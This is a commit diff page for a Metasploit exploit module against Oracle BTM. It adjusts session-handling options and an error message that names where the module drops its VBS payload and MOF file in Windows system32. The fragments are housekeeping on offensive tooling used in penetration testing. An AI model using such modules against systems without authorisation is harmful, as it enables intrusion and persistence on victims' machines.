You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Copy file name to clipboardExpand all lines: modules/exploits/windows/http/oracle_btm_writetofile.rb
+5-26Lines changed: 5 additions & 26 deletions
Original file line number
Diff line number
Diff line change
@@ -45,6 +45,10 @@ def initialize(info = {})
45
45
['BID','54839'],
46
46
['EDB','20318']
47
47
],
48
+
'DefaultOptions'=>
49
+
{
50
+
'WfsDelay'=>5
51
+
},
48
52
'Payload'=>
49
53
{
50
54
'DisableNops'=>true,
@@ -76,13 +80,6 @@ def initialize(info = {})
76
80
Opt::RPORT(7001),
77
81
OptInt.new('DEPTH',[false,'Traversal depth'])
78
82
],self.class)
79
-
80
-
register_advanced_options(
81
-
[
82
-
OptBool.new("ExitOnSession",[false,"Return from the exploit after a session has been created",true]),
83
-
OptInt.new("ListenerTimeout",[false,"The maximum number of seconds to wait for new sessions",0])
84
-
],self.class)
85
-
86
83
end
87
84
88
85
defon_new_session(client)
@@ -92,7 +89,7 @@ def on_new_session(client)
92
89
93
90
ifclient.type != "meterpreter"
94
91
print_error("NOTE: you must use a meterpreter payload in order to automatically cleanup.")
95
-
print_error("The vbs payload and mof file must be removed manually.")
92
+
print_error("The vbs payload (C:\\windows\\system32\\#{@var_vbs_name}.vbs) and mof file (C:\\windows\\system32\\wbem\\mof\\good\\#{@var_mof_name}.mof) must be removed manually.")
96
93
return
97
94
end
98
95
@@ -268,24 +265,6 @@ def exploit
268
265
'method'=>'GET',
269
266
},5)
270
267
271
-
272
-
else# This shouldn't happen
273
-
return
274
-
end
275
-
276
-
print_status("Waiting for a payload session (backgrounding)...")
277
-
278
-
if not datastore['ExitOnSession']and not job_id
279
-
fail_with(Exploit::Failure::Unknown,"Setting ExitOnSession to false requires running as a job (exploit -j)")
0 commit comments